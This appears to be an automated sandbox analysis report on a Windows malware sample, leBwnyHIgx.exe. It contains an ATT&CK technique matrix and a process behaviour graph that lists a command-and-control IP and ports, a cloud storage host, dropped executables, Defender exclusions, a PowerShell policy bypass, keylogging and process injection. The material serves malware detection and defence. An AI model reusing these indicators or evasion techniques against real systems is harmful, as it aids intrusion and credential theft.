                      Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 223 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                      Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 223 Process Injection; 1 Indicator Removal
                      Credential Access: 121 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                      Discovery: 2 System Time Discovery; 11 Peripheral Device Discovery; 3 File and Directory Discovery; 36 System Information Discovery; 1 Query Registry; 131 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; Network Service Discovery; System Network Connections Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                      Collection: 1 Archive Collected Data; 1 Screen Capture; 121 Input Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                      Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                      Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph (ID: 1585743, Sample: leBwnyHIgx.exe, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100)

                      Start
                        • DNS/IP Info: xrpy.oss-ap-southeast-1.aliyuncs.com
                        • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures
                        • started: leBwnyHIgx.exe
                          • DNS/IP Info: 154.82.85.107, ports 15091, 15092, 18852 (ROOTNETWORKSUS, Seychelles); xrpy.oss-ap-southeast-1.aliyuncs.com 47.79.48.230, ports 443, 49732 (VODAFONE-TRANSIT-ASVodafoneNZLtdNZ, United States)
                          • Created Files (dropped): C:\Users\user\Downloads\wpsv.5.6.3.exe (PE32); C:\Users\user\AppData\...\leBwnyHIgx.exe (PE32); C:\Users\...\leBwnyHIgx.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\wpsv.5.6.3[1].exe (PE32)
                          • Signatures: Adds a directory exclusion to Windows Defender
                          • started: leBwnyHIgx.exe (second instance)
                            • Signatures: Multi AV Scanner detection for dropped file; Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes
                            • started: cmd.exe
                              • started: powershell.exe
                                • Signatures: Loading BitLocker PowerShell Module
                              • started: conhost.exe
                            • started: cmd.exe
                              • started: conhost.exe
                              • started: powershell.exe
                          • started: cmd.exe
                            • Signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
                            • started: powershell.exe
                              • Signatures: Loading BitLocker PowerShell Module
                              • started: WmiPrvSE.exe
                            • started: conhost.exe
                          • started: cmd.exe
                            • started: powershell.exe
                            • started: conhost.exe
                          • started: cmd.exe
                            • started: powershell.exe
                            • started: conhost.exe

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.